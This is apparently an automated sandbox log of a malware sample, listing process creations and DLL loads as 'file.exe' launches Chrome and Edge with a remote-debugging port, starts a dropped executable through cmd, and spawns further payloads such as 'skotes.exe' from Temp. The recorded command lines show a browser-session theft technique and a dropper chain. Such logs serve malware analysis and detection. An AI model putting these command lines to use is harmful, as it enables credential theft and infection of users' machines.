Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7324 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHCFBFBAEBK.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2480,i,12669535664876434942,9463197344397114714,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2112,i,15661409552434283723,8671285796704867672,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2768 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6760 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7196 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7324 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHCFBFBAEBK.exe "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Section loaded: windows.storage.dll
